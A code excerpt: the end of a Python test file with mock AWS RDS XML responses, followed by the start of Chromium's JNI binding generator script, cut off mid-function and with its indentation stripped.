def default_body(self):
return """
<DescribeDBLogFilesResponse xmlns="http://rds.amazonaws.com/doc/2013-02-12/">
<DescribeDBLogFilesResult>
<DescribeDBLogFiles>
<DescribeDBLogFilesDetails>
<LastWritten>1364403600000</LastWritten>
<LogFileName>error/mysql-error-running.log</LogFileName>
<Size>0</Size>
</DescribeDBLogFilesDetails>
<DescribeDBLogFilesDetails>
<LastWritten>1364338800000</LastWritten>
<LogFileName>error/mysql-error-running.log.0</LogFileName>
<Size>0</Size>
</DescribeDBLogFilesDetails>
<DescribeDBLogFilesDetails>
<LastWritten>1364342400000</LastWritten>
<LogFileName>error/mysql-error-running.log.1</LogFileName>
<Size>0</Size>
</DescribeDBLogFilesDetails>
<DescribeDBLogFilesDetails>
<LastWritten>1364346000000</LastWritten>
<LogFileName>error/mysql-error-running.log.2</LogFileName>
<Size>0</Size>
</DescribeDBLogFilesDetails>
<DescribeDBLogFilesDetails>
<LastWritten>1364349600000</LastWritten>
<LogFileName>error/mysql-error-running.log.3</LogFileName>
<Size>0</Size>
</DescribeDBLogFilesDetails>
<DescribeDBLogFilesDetails>
<LastWritten>1364405700000</LastWritten>
<LogFileName>error/mysql-error.log</LogFileName>
<Size>0</Size>
</DescribeDBLogFilesDetails>
</DescribeDBLogFiles>
</DescribeDBLogFilesResult>
<ResponseMetadata>
<RequestId>d70fb3b3-9704-11e2-a0db-871552e0ef19</RequestId>
</ResponseMetadata>
</DescribeDBLogFilesResponse>
"""
def test_get_all_logs(self):
self.set_http_response(status_code=200)
response = self.service_connection.get_all_logs()
self.assert_request_parameters({
'Action': 'DescribeDBLogFiles',
'MaxRecords': 26,
}, ignore_params_values=['Version'])
self.assertEqual(len(response), 6)
self.assertTrue(isinstance(response[0], LogFile))
self.assertEqual(response[0].log_filename, 'error/mysql-error-running.log')
self.assertEqual(response[0].last_written, '1364403600000')
self.assertEqual(response[0].size, '0')
def test_get_all_logs_single(self):
self.set_http_response(status_code=200)
response = self.service_connection.get_all_logs('db_instance_1')
self.assert_request_parameters({
'Action': 'DescribeDBLogFiles',
'DBInstanceIdentifier': 'db_instance_1',
'MaxRecords': 26,
}, ignore_params_values=['Version'])
self.assertEqual(len(response), 6)
self.assertTrue(isinstance(response[0], LogFile))
self.assertEqual(response[0].log_filename, 'error/mysql-error-running.log')
self.assertEqual(response[0].last_written, '1364403600000')
self.assertEqual(response[0].size, '0')
class TestRDSOptionGroupOptions(AWSMockServiceTestCase):
connection_class = RDSConnection
def setUp(self):
super(TestRDSOptionGroupOptions, self).setUp()
def default_body(self):
return """
<DescribeOptionGroupOptionsResponse xmlns="http://rds.amazonaws.com/doc/2013-05-15/">
<DescribeOptionGroupOptionsResult>
<OptionGroupOptions>
<OptionGroupOption>
<MajorEngineVersion>11.2</MajorEngineVersion>
<PortRequired>true</PortRequired>
<OptionsDependedOn/>
<Description>Oracle Enterprise Manager</Description>
<DefaultPort>1158</DefaultPort>
<Name>OEM</Name>
<EngineName>oracle-se1</EngineName>
<MinimumRequiredMinorEngineVersion>0.2.v3</MinimumRequiredMinorEngineVersion>
<Persistent>false</Persistent>
<Permanent>false</Permanent>
</OptionGroupOption>
</OptionGroupOptions>
</DescribeOptionGroupOptionsResult>
<ResponseMetadata>
<RequestId>d9c8f6a1-84c7-11e1-a264-0b23c28bc344</RequestId>
</ResponseMetadata>
</DescribeOptionGroupOptionsResponse>
"""
def test_describe_option_group_options(self):
self.set_http_response(status_code=200)
response = self.service_connection.describe_option_group_options()
self.assertEqual(len(response), 1)
options = response[0]
self.assertEqual(options.name, 'OEM')
self.assertEqual(options.description, 'Oracle Enterprise Manager')
self.assertEqual(options.engine_name, 'oracle-se1')
self.assertEqual(options.major_engine_version, '11.2')
self.assertEqual(options.min_minor_engine_version, '0.2.v3')
self.assertEqual(options.port_required, True)
self.assertEqual(options.default_port, 1158)
self.assertEqual(options.permanent, False)
self.assertEqual(options.persistent, False)
self.assertEqual(options.depends_on, [])
if __name__ == '__main__':
unittest.main()
| mit |
ShinyROM/android_external_chromium_org | base/android/jni_generator/jni_generator.py | 15 | 40336 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Extracts native methods from a Java file and generates the JNI bindings.
If you change this, please run and update the tests."""
import collections
import errno
import optparse
import os
import re
import string
from string import Template
import subprocess
import sys
import textwrap
import zipfile
class ParseError(Exception):
"""Exception thrown when we can't parse the input file."""
def __init__(self, description, *context_lines):
Exception.__init__(self)
self.description = description
self.context_lines = context_lines
def __str__(self):
context = '\n'.join(self.context_lines)
return '***\nERROR: %s\n\n%s\n***' % (self.description, context)
class Param(object):
"""Describes a param for a method, either java or native."""
def __init__(self, **kwargs):
self.datatype = kwargs['datatype']
self.name = kwargs['name']
class NativeMethod(object):
"""Describes a C/C++ method that is called by Java code"""
def __init__(self, **kwargs):
self.static = kwargs['static']
self.java_class_name = kwargs['java_class_name']
self.return_type = kwargs['return_type']
self.name = kwargs['name']
self.params = kwargs['params']
if self.params:
assert type(self.params) is list
assert type(self.params[0]) is Param
if (self.params and
self.params[0].datatype == kwargs.get('ptr_type', 'int') and
self.params[0].name.startswith('native')):
self.type = 'method'
self.p0_type = self.params[0].name[len('native'):]
if kwargs.get('native_class_name'):
self.p0_type = kwargs['native_class_name']
else:
self.type = 'function'
self.method_id_var_name = kwargs.get('method_id_var_name', None)
class CalledByNative(object):
"""Describes a java method exported to c/c++"""
def __init__(self, **kwargs):
self.system_class = kwargs['system_class']
self.unchecked = kwargs['unchecked']
self.static = kwargs['static']
self.java_class_name = kwargs['java_class_name']
self.return_type = kwargs['return_type']
self.name = kwargs['name']
self.params = kwargs['params']
self.method_id_var_name = kwargs.get('method_id_var_name', None)
self.signature = kwargs.get('signature')
self.is_constructor = kwargs.get('is_constructor', False)
self.env_call = GetEnvCall(self.is_constructor, self.static,
self.return_type)
self.static_cast = GetStaticCastForReturnType(self.return_type)
def JavaDataTypeToC(java_type):
"""Returns a C datatype for the given java type."""
java_pod_type_map = {
'int': 'jint',
'byte': 'jbyte',
'char': 'jchar',
'short': 'jshort',
'boolean': 'jboolean',
'long': 'jlong',
'double': 'jdouble',
'float': 'jfloat',
}
java_type_map = {
'void': 'void',
'String': 'jstring',
'java/lang/String': 'jstring',
'Class': 'jclass',
'java/lang/Class': 'jclass',
}
if java_type in java_pod_type_map:
return java_pod_type_map[java_type]
elif java_type in java_type_map:
return java_type_map[java_type]
elif java_type.endswith('[]'):
if java_type[:-2] in java_pod_type_map:
return java_pod_type_map[java_type[:-2]] + 'Array'
return 'jobjectArray'
else:
return 'jobject'
class JniParams(object):
_imports = []
_fully_qualified_class = ''
_package = ''
_inner_classes = []
_remappings = []
@staticmethod
def SetFullyQualifiedClass(fully_qualified_class):
JniParams._fully_qualified_class = 'L' + fully_qualified_class
JniParams._package = '/'.join(fully_qualified_class.split('/')[:-1])
@staticmethod
def ExtractImportsAndInnerClasses(contents):
contents = contents.replace('\n', '')
re_import = re.compile(r'import.*?(?P<class>\S*?);')
for match in re.finditer(re_import, contents):
JniParams._imports += ['L' + match.group('class').replace('.', '/')]
re_inner = re.compile(r'(class|interface)\s+?(?P<name>\w+?)\W')
for match in re.finditer(re_inner, contents):
inner = match.group('name')
if not JniParams._fully_qualified_class.endswith(inner):
JniParams._inner_classes += [JniParams._fully_qualified_class + '$' +
inner]
@staticmethod
def ParseJavaPSignature(signature_line):
prefix = 'Signature: '
return '"%s"' % signature_line[signature_line.index(prefix) + len(prefix):]
@staticmethod
def JavaToJni(param):
"""Converts a java param into a JNI signature type."""
pod_param_map = {
'int': 'I',
'boolean': 'Z',
'char': 'C',
'short': 'S',
'long': 'J',
'double': 'D',
'float': 'F',
'byte': 'B',
'void': 'V',
}
object_param_list = [
'Ljava/lang/Boolean',
'Ljava/lang/Integer',
'Ljava/lang/Long',
'Ljava/lang/Object',
'Ljava/lang/String',
'Ljava/lang/Class',
]
prefix = ''
# Array?
while param[-2:] == '[]':
prefix += '['
param = param[:-2]
# Generic?
if '<' in param:
param = param[:param.index('<')]
if param in pod_param_map:
return prefix + pod_param_map[param]
if '/' in param:
# Coming from javap, use the fully qualified param directly.
return prefix + 'L' + JniParams.RemapClassName(param) + ';'
for qualified_name in (object_param_list +
[JniParams._fully_qualified_class] +
JniParams._inner_classes):
if (qualified_name.endswith('/' + param) or
qualified_name.endswith('$' + param.replace('.', '$')) or
qualified_name == 'L' + param):
return prefix + JniParams.RemapClassName(qualified_name) + ';'
# Is it from an import? (e.g. referecing Class from import pkg.Class;
# note that referencing an inner class Inner from import pkg.Class.Inner
# is not supported).
for qualified_name in JniParams._imports:
if qualified_name.endswith('/' + param):
# Ensure it's not an inner class.
components = qualified_name.split('/')
if len(components) > 2 and components[-2][0].isupper():
raise SyntaxError('Inner class (%s) can not be imported '
'and used by JNI (%s). Please import the outer '
'class and use Outer.Inner instead.' %
(qualified_name, param))
return prefix + JniParams.RemapClassName(qualified_name) + ';'
# Is it an inner class from an outer class import? (e.g. referencing
# Class.Inner from import pkg.Class).
if '.' in param:
components = param.split('.')
outer = '/'.join(components[:-1])
inner = components[-1]
for qualified_name in JniParams._imports:
if qualified_name.endswith('/' + outer):
return (prefix + JniParams.RemapClassName(qualified_name) +
'$' + inner + ';')
# Type not found, falling back to same package as this class.
return (prefix + 'L' +
JniParams.RemapClassName(JniParams._package + '/' + param) + ';')
@staticmethod
def Signature(params, returns, wrap):
"""Returns the JNI signature for the given datatypes."""
items = ['(']
items += [JniParams.JavaToJni(param.datatype) for param in params]
items += [')']
items += [JniParams.JavaToJni(returns)]
if wrap:
return '\n' + '\n'.join(['"' + item + '"' for item in items])
else:
return '"' + ''.join(items) + '"'
@staticmethod
def Parse(params):
"""Parses the params into a list of Param objects."""
if not params:
return []
ret = []
for p in [p.strip() for p in params.split(',')]:
items = p.split(' ')
if 'final' in items:
items.remove('final')
param = Param(
datatype=items[0],
name=(items[1] if len(items) > 1 else 'p%s' % len(ret)),
)
ret += [param]
return ret
@staticmethod
def RemapClassName(class_name):
"""Remaps class names using the jarjar mapping table."""
for old, new in JniParams._remappings:
if old in class_name:
return class_name.replace(old, new, 1)
return class_name
@staticmethod
def SetJarJarMappings(mappings):
"""Parse jarjar mappings from a string."""
JniParams._remappings = []
for line in mappings.splitlines():
keyword, src, dest = line.split()
if keyword != 'rule':
continue
assert src.endswith('.**')
src = src[:-2].replace('.', '/')
dest = dest.replace('.', '/')
if dest.endswith('@0'):
JniParams._remappings.append((src, dest[:-2] + src))
else:
assert dest.endswith('@1')
JniParams._remappings.append((src, dest[:-2]))
def ExtractJNINamespace(contents):
re_jni_namespace = re.compile('.*?@JNINamespace\("(.*?)"\)')
m = re.findall(re_jni_namespace, contents)
if not m:
return ''
return m[0]
def ExtractFullyQualifiedJavaClassName(java_file_name, contents):
re_package = re.compile('.*?package (.*?);')
matches = re.findall(re_package, contents)
if not matches:
raise SyntaxError('Unable to find "package" line in %s' % java_file_name)
return (matches[0].replace('.', '/') + '/' +
os.path.splitext(os.path.basename(java_file_name))[0])
def ExtractNatives(contents, ptr_type):
"""Returns a list of dict containing information about a native method."""
contents = contents.replace('\n', '')
natives = []
re_native = re.compile(r'(@NativeClassQualifiedName'
'\(\"(?P<native_class_name>.*?)\"\))?\s*'
'(@NativeCall(\(\"(?P<java_class_name>.*?)\"\)))?\s*'
'(?P<qualifiers>\w+\s\w+|\w+|\s+)\s*?native '
'(?P<return_type>\S*?) '
'(?P<name>\w+?)\((?P<params>.*?)\);')
for match in re.finditer(re_native, contents):
native = NativeMethod(
static='static' in match.group('qualifiers'),
java_class_name=match.group('java_class_name'),
native_class_name=match.group('native_class_name'),
return_type=match.group('return_type'),
name=match.group('name').replace('native', ''),
params=JniParams.Parse(match.group('params')),
ptr_type=ptr_type)
natives += [native]
return natives
def GetStaticCastForReturnType(return_type):
type_map = { 'String' : 'jstring',
'java/lang/String' : 'jstring',
'boolean[]': 'jbooleanArray',
'byte[]': 'jbyteArray',
'char[]': 'jcharArray',
'short[]': 'jshortArray',
'int[]': 'jintArray',
'long[]': 'jlongArray',
'double[]': 'jdoubleArray' }
ret = type_map.get(return_type, None)
if ret:
return ret
if return_type.endswith('[]'):
return 'jobjectArray'
return None
def GetEnvCall(is_constructor, is_static, return_type):
"""Maps the types availabe via env->Call__Method."""
if is_constructor:
return 'NewObject'
env_call_map = {'boolean': 'Boolean',
'byte': 'Byte',
'char': 'Char',
'short': 'Short',
'int': 'Int',
'long': 'Long',
'float': 'Float',
'void': 'Void',
'double': 'Double',
'Object': 'Object',
}
call = env_call_map.get(return_type, 'Object')
if is_static:
call = 'Static' + call
return 'Call' + call + 'Method'
def GetMangledParam(datatype):
"""Returns a mangled identifier for the datatype."""
if len(datatype) <= 2:
return datatype.replace('[', 'A')
ret = ''
for i in range(1, len(datatype)):
c = datatype[i]
if c == '[':
ret += 'A'
elif c.isupper() or datatype[i - 1] in ['/', 'L']:
ret += c.upper()
return ret
def GetMangledMethodName(name, params, return_type):
"""Returns a mangled method name for the given signature.
The returned name can be used as a C identifier and will be unique for all
valid overloads of the same method.
Args:
name: string.
params: list of Param.
return_type: string.
Returns:
A mangled name.
"""
mangled_items = []
for datatype in [return_type] + [x.datatype for x in params]:
mangled_items += [GetMangledParam(JniParams.JavaToJni(datatype))]
mangled_name = name + '_'.join(mangled_items)
assert re.match(r'[0-9a-zA-Z_]+', mangled_name)
return mangled_name
def MangleCalledByNatives(called_by_natives):
"""Mangles all the overloads from the call_by_natives list."""
method_counts = collections.defaultdict(
lambda: collections.defaultdict(lambda: 0))
for called_by_native in called_by_natives:
java_class_name = called_by_native.java_class_name
name = called_by_native.name
method_counts[java_class_name][name] += 1
for called_by_native in called_by_natives:
java_class_name = called_by_native.java_class_name
method_name = called_by_native.name
method_id_var_name = method_name
if method_counts[java_class_name][method_name] > 1:
method_id_var_name = GetMangledMethodName(method_name,
called_by_native.params,
called_by_native.return_type)
called_by_native.method_id_var_name = method_id_var_name
return called_by_natives
# Regex to match the JNI return types that should be included in a
# ScopedJavaLocalRef.
RE_SCOPED_JNI_RETURN_TYPES = re.compile('jobject|jclass|jstring|.*Array')
# Regex to match a string like "@CalledByNative public void foo(int bar)".
RE_CALLED_BY_NATIVE = re.compile(
'@CalledByNative(?P<Unchecked>(Unchecked)*?)(?:\("(?P<annotation>.*)"\))?'
'\s+(?P<prefix>[\w ]*?)'
'\s*(?P<return_type>\S+?)'
'\s+(?P<name>\w+)'
'\s*\((?P<params>[^\)]*)\)')
def ExtractCalledByNatives(contents):
"""Parses all methods annotated with @CalledByNative.
Args:
contents: the contents of the java file.
Returns:
A list of dict with information about the annotated methods.
TODO(bulach): return a CalledByNative object.
Raises:
ParseError: if unable to parse.
"""
called_by_natives = []
for match in re.finditer(RE_CALLED_BY_NATIVE, contents):
called_by_natives += [CalledByNative(
system_class=False,
unchecked='Unchecked' in match.group('Unchecked'),
static='static' in match.group('prefix'),
java_class_name=match.group('annotation') or '',
return_type=match.group('return_type'),
name=match.group('name'),
params=JniParams.Parse(match.group('params')))]
# Check for any @CalledByNative occurrences that weren't matched.
unmatched_lines = re.sub(RE_CALLED_BY_NATIVE, '', contents).split('\n')
for line1, line2 in zip(unmatched_lines, unmatched_lines[1:]):
if '@CalledByNative' in line1:
raise ParseError('could not parse @CalledByNative method signature',
line1, line2)
return MangleCalledByNatives(called_by_natives)
class JNIFromJavaP(object):
"""Uses 'javap' to parse a .class file and generate the JNI header file."""
def __init__(self, contents, options):
self.contents = contents
self.namespace = options.namespace
self.fully_qualified_class = re.match(
'.*?(class|interface) (?P<class_name>.*?)( |{)',
contents[1]).group('class_name')
self.fully_qualified_class = self.fully_qualified_class.replace('.', '/')
# Java 7's javap includes type parameters in output, like HashSet<T>. Strip
# away the <...> and use the raw class name that Java 6 would've given us.
self.fully_qualified_class = self.fully_qualified_class.split('<', 1)[0]
JniParams.SetFullyQualifiedClass(self.fully_qualified_class)
self.java_class_name = self.fully_qualified_class.split('/')[-1]
if not self.namespace:
self.namespace = 'JNI_' + self.java_class_name
re_method = re.compile('(?P<prefix>.*?)(?P<return_type>\S+?) (?P<name>\w+?)'
'\((?P<params>.*?)\)')
self.called_by_natives = []
for lineno, content in enumerate(contents[2:], 2):
match = re.match(re_method, content)
if not match:
continue
self.called_by_natives += [CalledByNative(
system_class=True,
unchecked=False,
static='static' in match.group('prefix'),
java_class_name='',
return_type=match.group('return_type').replace('.', '/'),
name=match.group('name'),
params=JniParams.Parse(match.group('params').replace('.', '/')),
signature=JniParams.ParseJavaPSignature(contents[lineno + 1]))]
re_constructor = re.compile('(.*?)public ' +
self.fully_qualified_class.replace('/', '.') +
'\((?P<params>.*?)\)')
for lineno, content in enumerate(contents[2:], 2):
match = re.match(re_constructor, content)
if not match:
continue
self.called_by_natives += [CalledByNative(
system_class=True,
unchecked=False,
static=False,
java_class_name='',
return_type=self.fully_qualified_class,
name='Constructor',
params=JniParams.Parse(match.group('params').replace('.', '/')),
signature=JniParams.ParseJavaPSignature(contents[lineno + 1]),
is_constructor=True)]
self.called_by_natives = MangleCalledByNatives(self.called_by_natives)
self.inl_header_file_generator = InlHeaderFileGenerator(
self.namespace, self.fully_qualified_class, [],
self.called_by_natives, options)
def GetContent(self):
return self.inl_header_file_generator.GetContent()
@staticmethod
def CreateFromClass(class_file, options):
class_name = os.path.splitext(os.path.basename(class_file))[0]
p = subprocess.Popen(args=['javap', '-s', class_name],
cwd=os.path.dirname(class_file),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = p.communicate()
jni_from_javap = JNIFromJavaP(stdout.split('\n'), options)
return jni_from_javap
class JNIFromJavaSource(object):
"""Uses the given java source file to generate the JNI header file."""
def __init__(self, contents, fully_qualified_class, options):
contents = self._RemoveComments(contents)
JniParams.SetFullyQualifiedClass(fully_qualified_class)
JniParams.ExtractImportsAndInnerClasses(contents)
jni_namespace = ExtractJNINamespace(contents)
natives = ExtractNatives(contents, options.ptr_type)
called_by_natives = ExtractCalledByNatives(contents)
if len(natives) == 0 and len(called_by_natives) == 0:
raise SyntaxError('Unable to find any JNI methods for %s.' %
fully_qualified_class)
inl_header_file_generator = InlHeaderFileGenerator(
jni_namespace, fully_qualified_class, natives, called_by_natives,
options)
self.content = inl_header_file_generator.GetContent()
def _RemoveComments(self, contents):
# We need to support both inline and block comments, and we need to handle
# strings that contain '//' or '/*'. Rather than trying to do all that with
# regexps, we just pipe the contents through the C preprocessor. We tell cpp
# the file has already been preprocessed, so it just removes comments and
# doesn't try to parse #include, #pragma etc.
#
# TODO(husky): This is a bit hacky. It would be cleaner to use a real Java
# parser. Maybe we could ditch JNIFromJavaSource and just always use
# JNIFromJavaP; or maybe we could rewrite this script in Java and use APT.
# http://code.google.com/p/chromium/issues/detail?id=138941
p = subprocess.Popen(args=['cpp', '-fpreprocessed'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, _ = p.communicate(contents)
return stdout
def GetContent(self):
return self.content
@staticmethod
def CreateFromFile(java_file_name, options):
contents = file(java_file_name).read()
fully_qualified_class = ExtractFullyQualifiedJavaClassName(java_file_name,
contents)
return JNIFromJavaSource(contents, fully_qualified_class, options)
class InlHeaderFileGenerator(object):
"""Generates an inline header file for JNI integration."""
def __init__(self, namespace, fully_qualified_class, natives,
called_by_natives, options):
self.namespace = namespace
self.fully_qualified_class = fully_qualified_class
self.class_name = self.fully_qualified_class.split('/')[-1]
self.natives = natives
self.called_by_natives = called_by_natives
self.header_guard = fully_qualified_class.replace('/', '_') + '_JNI'
self.script_name = options.script_name
def GetContent(self):
"""Returns the content of the JNI binding file."""
template = Template("""\
// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This file is autogenerated by
// ${SCRIPT_NAME}
// For
// ${FULLY_QUALIFIED_CLASS}
#ifndef ${HEADER_GUARD}
#define ${HEADER_GUARD}
#include <jni.h>
#include "base/android/jni_android.h"
#include "base/android/scoped_java_ref.h"
#include "base/basictypes.h"
#include "base/logging.h"
using base::android::ScopedJavaLocalRef;
// Step 1: forward declarations.
namespace {
$CLASS_PATH_DEFINITIONS
} // namespace
$OPEN_NAMESPACE
$FORWARD_DECLARATIONS
// Step 2: method stubs.
$METHOD_STUBS
// Step 3: RegisterNatives.
static bool RegisterNativesImpl(JNIEnv* env) {
$REGISTER_NATIVES_IMPL
return true;
}
$CLOSE_NAMESPACE
#endif // ${HEADER_GUARD}
""")
values = {
'SCRIPT_NAME': self.script_name,
'FULLY_QUALIFIED_CLASS': self.fully_qualified_class,
'CLASS_PATH_DEFINITIONS': self.GetClassPathDefinitionsString(),
'FORWARD_DECLARATIONS': self.GetForwardDeclarationsString(),
'METHOD_STUBS': self.GetMethodStubsString(),
'OPEN_NAMESPACE': self.GetOpenNamespaceString(),
'REGISTER_NATIVES_IMPL': self.GetRegisterNativesImplString(),
'CLOSE_NAMESPACE': self.GetCloseNamespaceString(),
'HEADER_GUARD': self.header_guard,
}
return WrapOutput(template.substitute(values))
def GetClassPathDefinitionsString(self):
ret = []
ret += [self.GetClassPathDefinitions()]
return '\n'.join(ret)
def GetForwardDeclarationsString(self):
ret = []
for native in self.natives:
if native.type != 'method':
ret += [self.GetForwardDeclaration(native)]
return '\n'.join(ret)
def GetMethodStubsString(self):
ret = []
for native in self.natives:
if native.type == 'method':
ret += [self.GetNativeMethodStub(native)]
for called_by_native in self.called_by_natives:
ret += [self.GetCalledByNativeMethodStub(called_by_native)]
return '\n'.join(ret)
def GetKMethodsString(self, clazz):
ret = []
for native in self.natives:
if (native.java_class_name == clazz or
(not native.java_class_name and clazz == self.class_name)):
ret += [self.GetKMethodArrayEntry(native)]
return '\n'.join(ret)
def GetRegisterNativesImplString(self):
"""Returns the implementation for RegisterNatives."""
template = Template("""\
static const JNINativeMethod kMethods${JAVA_CLASS}[] = {
${KMETHODS}
};
const int kMethods${JAVA_CLASS}Size = arraysize(kMethods${JAVA_CLASS});
if (env->RegisterNatives(g_${JAVA_CLASS}_clazz,
kMethods${JAVA_CLASS},
kMethods${JAVA_CLASS}Size) < 0) {
LOG(ERROR) << "RegisterNatives failed in " << __FILE__;
return false;
}
""")
ret = [self.GetFindClasses()]
all_classes = self.GetUniqueClasses(self.natives)
all_classes[self.class_name] = self.fully_qualified_class
for clazz in all_classes:
kmethods = self.GetKMethodsString(clazz)
if kmethods:
values = {'JAVA_CLASS': clazz,
'KMETHODS': kmethods}
ret += [template.substitute(values)]
if not ret: return ''
return '\n' + '\n'.join(ret)
def GetOpenNamespaceString(self):
if self.namespace:
all_namespaces = ['namespace %s {' % ns
for ns in self.namespace.split('::')]
return '\n'.join(all_namespaces)
return ''
def GetCloseNamespaceString(self):
if self.namespace:
all_namespaces = ['} // namespace %s' % ns
for ns in self.namespace.split('::')]
all_namespaces.reverse()
return '\n'.join(all_namespaces) + '\n'
return ''
def GetJNIFirstParam(self, native):
ret = []
if native.type == 'method':
ret = ['jobject obj']
elif native.type == 'function':
if native.static:
ret = ['jclass clazz']
else:
ret = ['jobject obj']
return ret
def GetParamsInDeclaration(self, native):
"""Returns the params for the stub declaration.
Args:
native: the native dictionary describing the method.
Returns:
A string containing the params.
"""
return ',\n '.join(self.GetJNIFirstParam(native) +
[JavaDataTypeToC(param.datatype) + ' ' +
param.name
for param in native.params])
def GetCalledByNativeParamsInDeclaration(self, called_by_native):
return ',\n '.join([JavaDataTypeToC(param.datatype) + ' ' +
param.name
for param in called_by_native.params])
def GetForwardDeclaration(self, native):
template = Template("""
static ${RETURN} ${NAME}(JNIEnv* env, ${PARAMS});
""")
values = {'RETURN': JavaDataTypeToC(native.return_type),
'NAME': native.name,
'PARAMS': self.GetParamsInDeclaration(native)}
return template.substitute(values)
def GetNativeMethodStub(self, native):
"""Returns stubs for native methods."""
template = Template("""\
static ${RETURN} ${NAME}(JNIEnv* env, ${PARAMS_IN_DECLARATION}) {
DCHECK(${PARAM0_NAME}) << "${NAME}";
${P0_TYPE}* native = reinterpret_cast<${P0_TYPE}*>(${PARAM0_NAME});
return native->${NAME}(env, obj${PARAMS_IN_CALL})${POST_CALL};
}
""")
params_for_call = ', '.join(p.name for p in native.params[1:])
if params_for_call:
params_for_call = ', ' + params_for_call
return_type = JavaDataTypeToC(native.return_type)
if re.match(RE_SCOPED_JNI_RETURN_TYPES, return_type):
scoped_return_type = 'ScopedJavaLocalRef<' + return_type + '>'
post_call = '.Release()'
else:
scoped_return_type = return_type
post_call = ''
values = {
'RETURN': return_type,
'SCOPED_RETURN': scoped_return_type,
'NAME': native.name,
'PARAMS_IN_DECLARATION': self.GetParamsInDeclaration(native),
'PARAM0_NAME': native.params[0].name,
'P0_TYPE': native.p0_type,
'PARAMS_IN_CALL': params_for_call,
'POST_CALL': post_call
}
return template.substitute(values)
def GetCalledByNativeMethodStub(self, called_by_native):
"""Returns a string."""
function_signature_template = Template("""\
static ${RETURN_TYPE} Java_${JAVA_CLASS}_${METHOD_ID_VAR_NAME}(\
JNIEnv* env${FIRST_PARAM_IN_DECLARATION}${PARAMS_IN_DECLARATION})""")
function_header_template = Template("""\
${FUNCTION_SIGNATURE} {""")
function_header_with_unused_template = Template("""\
${FUNCTION_SIGNATURE} __attribute__ ((unused));
${FUNCTION_SIGNATURE} {""")
template = Template("""
static base::subtle::AtomicWord g_${JAVA_CLASS}_${METHOD_ID_VAR_NAME} = 0;
${FUNCTION_HEADER}
/* Must call RegisterNativesImpl() */
DCHECK(g_${JAVA_CLASS}_clazz);
jmethodID method_id =
${GET_METHOD_ID_IMPL}
${RETURN_DECLARATION}
${PRE_CALL}env->${ENV_CALL}(${FIRST_PARAM_IN_CALL},
method_id${PARAMS_IN_CALL})${POST_CALL};
${CHECK_EXCEPTION}
${RETURN_CLAUSE}
}""")
if called_by_native.static or called_by_native.is_constructor:
first_param_in_declaration = ''
first_param_in_call = ('g_%s_clazz' %
(called_by_native.java_class_name or
self.class_name))
else:
first_param_in_declaration = ', jobject obj'
first_param_in_call = 'obj'
params_in_declaration = self.GetCalledByNativeParamsInDeclaration(
called_by_native)
if params_in_declaration:
params_in_declaration = ', ' + params_in_declaration
params_for_call = ', '.join(param.name
for param in called_by_native.params)
if params_for_call:
params_for_call = ', ' + params_for_call
pre_call = ''
post_call = ''
if called_by_native.static_cast:
pre_call = 'static_cast<%s>(' % called_by_native.static_cast
post_call = ')'
check_exception = ''
if not called_by_native.unchecked:
check_exception = 'base::android::CheckException(env);'
return_type = JavaDataTypeToC(called_by_native.return_type)
return_declaration = ''
return_clause = ''
if return_type != 'void':
pre_call = ' ' + pre_call
return_declaration = return_type + ' ret ='
if re.match(RE_SCOPED_JNI_RETURN_TYPES, return_type):
return_type = 'ScopedJavaLocalRef<' + return_type + '>'
return_clause = 'return ' + return_type + '(env, ret);'
else:
return_clause = 'return ret;'
values = {
'JAVA_CLASS': called_by_native.java_class_name or self.class_name,
'METHOD': called_by_native.name,
'RETURN_TYPE': return_type,
'RETURN_DECLARATION': return_declaration,
'RETURN_CLAUSE': return_clause,
'FIRST_PARAM_IN_DECLARATION': first_param_in_declaration,
'PARAMS_IN_DECLARATION': params_in_declaration,
'STATIC': 'Static' if called_by_native.static else '',
'PRE_CALL': pre_call,
'POST_CALL': post_call,
'ENV_CALL': called_by_native.env_call,
'FIRST_PARAM_IN_CALL': first_param_in_call,
'PARAMS_IN_CALL': params_for_call,
'METHOD_ID_VAR_NAME': called_by_native.method_id_var_name,
'CHECK_EXCEPTION': check_exception,
'GET_METHOD_ID_IMPL': self.GetMethodIDImpl(called_by_native)
}
values['FUNCTION_SIGNATURE'] = (
function_signature_template.substitute(values))
if called_by_native.system_class:
values['FUNCTION_HEADER'] = (
function_header_with_unused_template.substitute(values))
else:
values['FUNCTION_HEADER'] = function_header_template.substitute(values)
return template.substitute(values)
def GetKMethodArrayEntry(self, native):
template = Template("""\
{ "native${NAME}", ${JNI_SIGNATURE}, reinterpret_cast<void*>(${NAME}) },""")
values = {'NAME': native.name,
'JNI_SIGNATURE': JniParams.Signature(native.params,
native.return_type,
True)}
return template.substitute(values)
def GetUniqueClasses(self, origin):
ret = {self.class_name: self.fully_qualified_class}
for entry in origin:
class_name = self.class_name
jni_class_path = self.fully_qualified_class
if entry.java_class_name:
class_name = entry.java_class_name
jni_class_path = self.fully_qualified_class + '$' + class_name
ret[class_name] = jni_class_path
return ret
def GetClassPathDefinitions(self):
"""Returns the ClassPath constants."""
ret = []
template = Template("""\
const char k${JAVA_CLASS}ClassPath[] = "${JNI_CLASS_PATH}";""")
native_classes = self.GetUniqueClasses(self.natives)
called_by_native_classes = self.GetUniqueClasses(self.called_by_natives)
all_classes = native_classes
all_classes.update(called_by_native_classes)
for clazz in all_classes:
values = {
'JAVA_CLASS': clazz,
'JNI_CLASS_PATH': JniParams.RemapClassName(all_classes[clazz]),
}
ret += [template.substitute(values)]
ret += ''
for clazz in called_by_native_classes:
template = Template("""\
// Leaking this jclass as we cannot use LazyInstance from some threads.
jclass g_${JAVA_CLASS}_clazz = NULL;""")
values = {
'JAVA_CLASS': clazz,
}
ret += [template.substitute(values)]
return '\n'.join(ret)
def GetFindClasses(self):
"""Returns the imlementation of FindClass for all known classes."""
template = Template("""\
g_${JAVA_CLASS}_clazz = reinterpret_cast<jclass>(env->NewGlobalRef(
base::android::GetClass(env, k${JAVA_CLASS}ClassPath).obj()));""")
ret = []
for clazz in self.GetUniqueClasses(self.called_by_natives):
values = {'JAVA_CLASS': clazz}
ret += [template.substitute(values)]
return '\n'.join(ret)
def GetMethodIDImpl(self, called_by_native):
"""Returns the implementation of GetMethodID."""
template = Template("""\
